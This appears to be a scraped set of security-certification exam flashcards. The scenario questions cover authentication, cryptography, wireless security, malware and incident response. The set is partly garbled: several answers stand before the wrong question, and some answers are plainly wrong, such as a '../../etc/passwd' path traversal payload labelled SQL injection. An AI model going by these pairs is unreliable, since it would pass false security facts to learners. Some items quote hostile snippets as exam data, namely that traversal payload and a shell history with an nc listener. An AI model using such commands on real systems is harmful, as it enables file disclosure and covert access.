an organization wants to utilize a commonInternet-based third-party provider for authorization and authentication. The provider Uses a technology based OAuth 2.0 toProvide required services. To which of the following technology is the provider referring?

OpenID connect

Kaye works for a large insurance company and manages their cybersecurity. She's concerned about insiders and wants to be able to detect malicious activity but wants the detection process to be invisible to the attacker. What technology best fits these needs?

Out-of-band NIDS

An in-house penetration tester has been asked to evade a new OLP system. The tester plans to exfiltrate data through steganography. Discovery of which of the following would help catch the tester in the act?

Outgoing emails containing unusually large image files

Ann is the IS manager for several new systems in which the classification of the systems' data are being decided. She is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification?

Owner

Ann is the IS manager for several new systems in which the classifications of the systems' data are being decided. She is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification?

Owner

Which of the following are used to increase the computing time it takes to brute force a password using an offline attack?

PBKDF2 bcrypt

Which of the following would provide additional security by adding another factor to a smart card?

PIN

A security manager is creating an account management policy for a global organization with sales personnel who must access corporate network resources while traveling all over the world. Which of the following practices is the security manager MOST likely to enforce with the policy? (Select TWO)

Password complexity Location-based authentication

A hacker has a packet capture that contains: ....Joe Smith.........E289F21CD33E4F57890DDEA5CF267ED2.. ...Jane.Doe...........AD1FAB10D33E4F57890DDEA5CF267ED2.. ....John.Key..........3374E9E7E33E4F57890DDEA5CF267ED2.. Which of the following tools will the hacker use against this type of capture?

Password cracker

A Chief Information Officer (CIO) recently saw on the news that a significant security flaws exists with a specific version of a technology the company uses to support many critical applications. The CIO wants to know if this reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which of the following would BEST provide the needed information?

Penetration test

Sharon is worried that some people in her company have more access privileges than they need. This concern came from people moving from one position to another while keeping their other rights, which exceed the requirements of the current position. Which of the following is the most effective in mitigating this issue?

Permission auditing

You work for a company that is issuing portable devices to employees for both work and personal use. The company is doing this so they can control the security of the devices. As an employee, what issue is raised by using a company-owned device for your work-related data and personal use?

Personal information being exposed

Matt is working as a security officer for his company. He noticed malware on one of the workstations and is concerned about the malware having multiple functions that might cause more security issues than currently detected. What is the best way to test this malware?

Place the malware in a sandbox environment for testing

Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a flight, Joe, decides to connect to the airport wireless network without connecting to a VPN,and the sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused the data breach?

Policy violation

Peter is trying to block unauthorized access to desktop computers inside the company network. He's configured the OS to lock after 5 minutes of inactivity. What type of security control has been implemented?

Preventative

Marsha is supposed to be receiving a document from Laura and wants to be able to identify that the document came from her. What should Laura use to make a digital signature on the document?

Private Key

You have an email that you are sending to a friend. You want to ensure it retains its integrity during transit, so you decide to digitally sign the email. When using a PKI system, what is used to encrypt the hash digest of the email to create a digital signature?

Private Key

During a penetration test, you were given a login name with minimal access and attempted to gain administrative access with this account. What is this called?

Privilege Escalation

Of the listed principles, which one is typically included in a BPA?

Profit sharing / losses and the addition/subtraction of a partner

You are responsible for the web application security for your company's e-commerce server. You're especially concerned with XSS and SQL injection. Of the following, which technique would be the most effective at mitigating these attacks?

Proper input Validation

As the security administrator, you're configuring data label options for your R&D file server. Standard users can label documents as contractor, public, or internal. Which label should be assigned to company trade secrets?

Proprietary

Thomas is seeking options for controlling physical access to the server room. He would like a hands-free solution. Which of the following would be his best choice?

Proximity Cards

An organization plans to implement multifactor authentication techniques within the enterprise network architecture. Each authentication factor is expected to be a unique control. Which of the following BEST describes the proper employment of multifactor authentication?

Proximity card, fingerprint scanner, PIN

In asymmetric encryption, what is used to decrypt a file that was encrypted using a private key?

Public Key

Ann, security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements?

Public key Private Key

Your company has purchased new laptops for your salespeople. Your IT department plans to dispose of the hard drives from the old computers as part of a sale. Which method would you use to properly dispose of the hard drives?

Purging

Which listed technique attempts to predict the likelihood of a threat occurrence and assigns monetary values in the event of a loss?

Quantitative Risk Assessment

You've been tasked with identifying which risks to mitigate based on cost. What is this an example of?

Quantitative Risk Assessment

After a user reports slow computer performance, a systems administrator detects a suspicious file, which was installed as part of a freeware software package. The systems administrator reviews the output below: c:\Windows\system32>netstat -nab Active Connections Pronto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0 RpcSs [svchoat.exe] TCP 0.0.0.0:445 0.0.0.0 [svchost.exe] TCP 192.168.1.10:5000 10.37.213.20 winserver.exe UDP 192.168.1.10:1900 *.* SSDPSVR Based on the above information, which of the following types of malware was installed on the user's computer?

RAT

Alissa has deployed session tokens on her network. What would these tokens be the most effective in protecting against?

Replay

A company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decrease the risk of users jailbreaking mobile devices?

Require applications to be digitally signed.

Peter noticed some users on the company network frequently have simple passwords that are made up of common words, therefore, known as weak passwords. How could this be mitigated?

Require password complexity

A systems administrator has isolated an infected system from the network and terminated the malicious process from executing. Which of the following should the administrator do NEXT according to the incident response process?

Restore loss from data backup

A company is deploying smartphones for its mobile salesforce. These devices are for personal and business use but are owned by the company. Sales personnel will save new customer data via a custom application developed for the company. This application will integrate with the contact information stored in the smartphones and will populate new customer records onto it. The customer application's data is encrypted at rest, and the application's connection to the back office system is considered secure. The Chief Information Security Officer (CISO) has concerns that customer contact information may be accidentally leaked due to the limited security capabilities of the devices and the planned controls. Which of the following will be the MOST efficient security control to implement to lower this risk?

Restrict contact information storage dataflow so it is only shared with the customer application.

David, a programmer, is using the waterfall method for application development. Using this method, at which phase of the SDLC can he stop implementing security measures?

Retirement

A security analyst is investigating a potential reach. Upon gathering, documenting, and securing the evidence, which of the following actions is the NEXT step to minimize the business impact?

Review lessons learned captured in the process

A local competitor is offering a new service that is predicted to sell strong. After much research, your company has decided not to launch a competing service due to the uncertainty of the market and the large investment required. Which best describes your company's decision?

Risk Avoidance

Of the following cloud service models, which service gives the consumer the ability to use applications provided by the cloud service provider over the Internet?

SaaS (Software as a Service)

A security administrator installed a new network scanner that identifies new host systems on the network. Which of the following did the security administrator install?

Rogue system detection

You are the security administrator for a large company where occasionally, a user needs to access certain resources that the user doesn't have permission to access. Which method would be the most beneficial?

Rule-Based Access Control

Wanda is responsible for network connectivity for her company. The sales department is transitioning to VoIP. What two protocols must be allowed through the firewall for this to be successful?

SIP and RTP

A security analyst receives an alert from a WAF with the following payload: var data = "<test test test> ++ <../../../../../../etc/passwd>" Which of the following types of attacks is this?

SQL injection (uses malicious code to manipulate your database into revealing information. Mitigating this attack vector is both easy and vital for keeping your information safe.)

A manager wants to distribute a report to several other managers with the company. Some of them reside in remote locations that are not connected to the domain but have a local server. Because there is sensitive data within the report and the size of the report is beyond the limit of the email attachment size, emailing the report is not an option. Which of the following protocols should be implemented to distribute the report securely? (Select THREE)

SSH FTPS HTTPS

A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual authentication. Which of the following should the engineer implement if the design requires client MAC addresses to be visible across the tunnel?

SSL VPN

A company wants to implement an access management solution that allows employees to use the same usernames and passwords for multiple applications without having to keep multiple credentials synchronized. Which of the following solutions would BEST meet these requirements? (Choose Two)

SSO, Federation

Larry is a network administrator for a small accounting firm and has heard some of his users complaining of slow connectivity. When he started investigating the firewall logs, he saw a large number of half-open connections. What best describes his findings?

SYN Flood

A company wants to ensure confidential data from storage media is sanitized in such a way that the drive cannot be reused. Which of the following method should the technician use?

Shredding

As the manager for network operations at his company, Shane saw an accountant in the hall who thanks him for keeping the antivirus software up to date. When asked what he means, he mentions one of the IT staff members named Michael called him yesterday and remotely connected to his PC to update the antivirus...but there's no employee named Michael. What happened?

Social Engineering

Ron is analyzing what he thinks is a malware outbreak on his network. Several users have reported that their machines are behaving strangely. The behavior seems to be occurring sporadically and there is no pattern. What is most likely the cause of the issue?

Sparse infector virus

John is a sales manager at his company. He has recently received an email asking him to click a link to fill out a survey. The email seems suspicious but it does mention a major association of which he's familiar, and makes him think it may be a legitimate email. Of the following, which best describes this attack?

Spear Phishing

A systems administrator wants to provide for and enforce wireless access accountability during events where external speakers are invited to make presentations to a mixed audience of employees and non-employees. Which of the following should the administrator implement?

Sponsored guest

An external attacker can modify the ARP cache of an internal computer. Which of the following types of attacks is described?

Spoofing

Frank is concerned that confidential documents, with proprietary information, may be leaked. The leaks could either be intentional or accidental, but he is looking for a solution that would embed some identifying information into documents in a way that it would not be seen by the reader but could be extracted with the right software. What technology would best meet these needs?

Steganography

Laura is responsible for security on the new e-commerce server. She would like to verify that online transactions are secure. What technology should she use?

TLS (Transport Layer Security)

Tracie has been using a packet sniffer to observe traffic in the company network and has noticed that traffic between the web server and the database server is sent in clear text. She would like a solution that will encrypt traffic and also leverage the existing digital certificate infrastructure the company has. Which of the following is the best solution?

TLS (Transport Layer Security)

The scan results identify the hostname and IP address.

Which of the following network vulnerability scan indicators BEST validates a successful, active scan?

Melanie manages the website security for a bank. When a user forgets their password, she wants to be able to give them a temporary password. What is the best solution for this situation?

TOTP

Chris is responsible for application development at his company. He believes all web applications need to be tested prior to being deployed live. He wants to use a test system that matches his live system. What is this called?

Test Server

Least privilege

The IT department needs to prevent users from installing untested applications. Which of the following would provide the BEST solution?

A security analyst us updating a BIA document. The security analyst notices the support vendor's time to replace a server hard drive went from eight hours to two hours. Given these new metrics, which of the following can be concluded?

The MTTR is faster. The RTO has decreased.

Of the following, which provides the best examples of the drawback of symmetric key systems?

The key must be delivered in a secure manner

Rhonda manages account security for her company. She's noticed a receptionist who has an account with a six-character password that hasn't been changed in two years and her password history isn't maintained. What is the most significant problem with this account?

The password length is most significant problem

Nate is considering the use of biometric access control systems for his company. He's concerned about the crossover error rate (CER), so which of the following processes would most accurately describe the CER?

The point at which false rejections and false acceptances are equal

Change antenna placement. Adjust power level controls

The security administrator has noticed cars parking just outside of the building fence line. Which of the following security measures can the administrator use to help protect the company's WiFi network against war driving? (Select TWO)

A malicious system continuously sends an extremely large number of SYN packets to a server. Which of the following BEST describes the resulting effect?

The server will exhaust its memory maintaining half-open connections

The company you work for is receiving a high call volume in regard to users trying to access the company website and receiving certificate errors. Which of the following best describes the issue?

The website certificate has expired

Penny, a saleslady in your company, sent in a request for assistance with a computer that is behaving sluggishly. You've checked but don't see any obvious malware, but you did locate a temp folder with JPEGs which are screenshots of his desktop. Of the following, which is most likely the cause?

There is spyware on the system.

Mike works for a company where employees have wearable technology, such as smartwatches. What is the most significant security concern for him in regard to such devices?

These devices can be used to carry data in/out of the company

Ashley is the network administrator for a company. She proceeds to delete the account for a user who left the company last week. The user's files were encrypted with a private key. How can Ashley view these files?

They can be decrypted using a recovery agent

You're tasked with configuring a friend's SOHO router and noticed a PIN on the back of their router. What is the purpose of this PIN?

This is a WPS (WiFi Protected Setup) PIN

One of the following items automatically updates browsers with a list of root certificates from an online web source used to track which certificates can be trusted, which one is it?

Trust Model

You're responsible for an always-on VPN connection for your company and have been told that it must utilize the most secure mode for IPSec possible. Which of the following is best?

Tunneling

You work for a company that requires a user's credentials to include providing something they know and something they are. Which of the following types of authentication is being described?

Two-Factor

Choose the type of hypervisor known as "bare metal"?

Type 1

Jeff, a network administrator, has discovered that someone registered a domain name that is spelled just one letter different from the company's domain. The website with the misspelled URL is a phishing site. What best describes this attack?

Typosquatting

Bob is responsible for network security at a very small company, so due to budget constraints and space constraints, he can only choose one security device. What should he select?

UTM (Unified Threat Management)

You have recently completed a review of company network traffic and saw where most of the malware infections are caused by users who visit illicit websites. You would like to implement a solution that will block these websites while scanning all network traffic for signs of malware and block the malware before it enters the company network. Which technology would be the best solution?

UTM (Unified Threat Management)

A security technician has been receiving alerts from several servers that indicate load balancers have had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the servers has increased. Which of the following is the MOST likely cause of the decreased disk space?

Unauthorized software

Jamie is worried that some users on her network could be accessing some files they don't have a reason to view, such as files not required for their job. Which of the following would best determine if this is happening?

Usage audit and review

Jonathan works for a large bank and one of his responsibilities is to ensure that web bank logins are as secure as possible. He's concerned that a customer's account login could be compromised and someone else would gain access to that customer's account. What is the best way to mitigate this threat?

Use SMS authentication for any logins from an unknown computer or location

You currently work for a large company and are concerned about ensuring all workstations have a common configuration, do not contain a rogue software installation, and all patches are kept up to date. Of the following, which would be most effective to accomplish this?

Use VDE

Josh, as an administrator for a health care company, is required to support an older, legacy application. He's concerned about the application having some vulnerabilities that would affect the remainder of the network. Of the following, which option is the most efficient way to mitigate this?

Use an Application Container

Janet has to deploy and support a legacy application where the configuration for this application and the OS are very specific and cannot be changed. Of the following options, which is the best approach to deploy this software?

Use an immutable server

A company has two wireless networks utilizing captive portals. Some employees report getting a trust error in their browsers when connecting to one of the networks. Both captive portals are using the same server certificate for authentication, but the analyst notices the following differences between the two certificate details: Certificate 1 Certificate Path: Geotrust Global CA *company.com Certificate 2 Certificate Path: *company.com Which of the following would resolve the problem?

Use certificate chaining.

A bank is experiencing a DoS attack against an application designed to handle 500IP-based sessions. in addition, the perimeter router can only handle 1Gbps of traffic. Which of the following should be implemented to prevent a DoS attacks in the future?

Use redundancy across all network devices and services

Laura is concerned about social engineering, specifically that this technique could be used by an attacker to obtain information about their network, even those relating to passwords. What countermeasure can be taken to ensure she's most effective in combating social engineering?

User Training

A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the systems administrator using?

User account

A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the system administrator using?

User accounts

Verify the certificate has not expired on the server. Update the root certificate into the client computer certificate store.

Users report the following message appears when browsing to the company's secure site: This website cannot be trusted. Which of the following actions should a security analyst take to resolve these messages? (Select two.)

Kenny is responsible for data backups from all the company servers. Two major concerns are the frequency of backup and the security of the backup data. Which feature, would be the most important?

Using Data Encryption

A dumpster diver recovers several hard drives from a company and is able to obtain confidential data from one of the hard drives. The company then discovers its information is posted online. Which of the following methods would have MOST likely prevented the data from being exposed?

Using magnetic fields to erase the data

You are currently testing your company network for security issues. The test you're conducting involves using automated and semi-automated tools to look for known vulnerabilities with various systems. Which of the following best describes this test?

Vulnerability Scan

In your network, there are over 150 computers. You need to determine which ones are secure and which ones are not secure. Which of the following tools would best meet your needs for the assessment?

Vulnerability Scanner

A security analyst is reviewing an assessment report that includes software versions, running services, supported encryption algorithms, and permission settings. Which of the following produced the report?

Vulnerability scanner

Scott manages WiFi security for his company. His main worry is that there are many other offices in the building that could easily attempt to breach their WiFi from one of these locations. Of the options below, which technique works best to address these concerns?

WAP Placement

An IV attack can be associated with which of the following?

WEP

Which of the standards below was developed by the WiFi Alliance and is used to implement the requirements of IEEE 802.11i??

WPA 2 (Wi-Fi Protected Access 2)

Ricky is over WiFI security for his company. Which wireless security protocol below uses TKIP?

WPA-Wi-Fi Protected Access

An administrator is replacing a wireless router. The configuration of the old wireless router was not documented before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment that was manufactured prior to the release of the 802.11i standard. Which of the following configuration options should the administrator select for the new wireless router?

WPA2+TKIP

A network administrator at a small office wants to simplify the configuration of mobile clients connecting to an encrypted wireless network. Which of the following should be implemented if the administrator does not want to provide the wireless password or certificate to the employees?

WPS

Leo noticed that attackers have breached his wireless network. They seem to have used a brute-force attack on the WiFi protected setup PIN to exploit the WAP and recover the WPA2 password. What type of attack is this?

WPS Attack

What type of attack is focused on targeting a specific individual like the CEO of a company?

Whaling

Which of the following types of attacks occurs when an attacker specifically targets the CEO, CFO, CIO, and other board members during their attack?

Whaling

DDoS

Which of the following attacks specifically impacts data availability?

Community

Which of the following types of cloud Infrastructures would allow several organizations with similar structures and interests to realize shared storage and resources?

Inactive local accounts

Which of the following would MOST likely appear in an uncredentialed vulnerability scan?

You work for a company that hired a pen testing firm to test the network. For the test, you gave them details on operating systems you use, applications you run and network devices. What describes this type of test?

White-Box Test

Of the following, which item is a list of applications approved for use on your network?

Whitelist

Of the following, which would allow a user permission to install only certain programs on a company-owned mobile device?

Whitelisting

A system admin from your company wants to know if there's a way to reduce the cost of certificates by purchasing one certificate to cover all domains/subdomains. Which of the following solutions is one you would offer?

Wildcards

Which of the following attack types BEST describes a client-side attack that is used to manipulate an HTML iframe with JavaScript code via a web browser?

XSS (cross site scripting enables attackers to inject client-side scripts into web pages viewed by other users)

East Central uses its own internal certificate server for all internal encryption, however, their CA only publishes a CRL once a week. Does this pose a danger? If so, what danger does it pose?

Yes, this means a revoked certificate can be used for up to seven days

A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for analysis. The analyst notices that an internal host had a socket established with another internal host over a non-standard port. Upon investigation, the origin host that initiated the socket shows this output: usera@host>history mkdir /local/usr/bin/somedirectory nc -1 192.168.5.1 -p 9856 ping -c 30 8.8.8.8 -a 600 rm /etc/dir2/somefile rm -rm /etc/dir2/ traceroute 8.8.8.8 pakill pid 9487 usera@host> Given the above output, which of the following commands would have established the questionable socket?

nc -1 192.168.5.1 -p 9856

When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said that they are:

pivoting

A web server, which is configured to use TLS with AES-GCM-256, SHA-384, and ECDSA, recently suffered an information loss breach. Which of the following is MOST likely the cause?

poor implementation

A security architect has convened a meeting to discuss an organization's key management policy. The organization has a reliable internal key management system, and some argue that it would be best to manage the cryptographic keys internally as opposed to using a solution from a third party. The company should use:

risk benefits analysis results to make a determination.

A technician suspects that a system has been compromised. The technician reviews the following log entry: WARNING - hash mismatch; C:\Window\SysWOW64|user32.dll WARNING - hash mismatch: C:\Window\SysWOW64|kernel32.dl Based solely on the above information. which of the foloowing types of malware is MOST likely installed on the system?

rootkit


Related study sets

Unfair Claims Settlement Practices

View Set

Annual DoD Cyber Awareness Challenge Exam

View Set

Chapter 24: PrepU - Nursing Management: Patients With Intestinal and Rectal Disorders

View Set

RN Targeted Medical Surgical ENDOCRINE (ATI)

View Set

Shock - Med Surg Success - Critical Thinking

View Set

Chapter 42: Management of Patients With Musculoskeletal Trauma

View Set

Common mistakes Psych 114 Multiple choice

View Set

Chapter 64: Arthritis and Connective Tissue Diseases (Practice)

View Set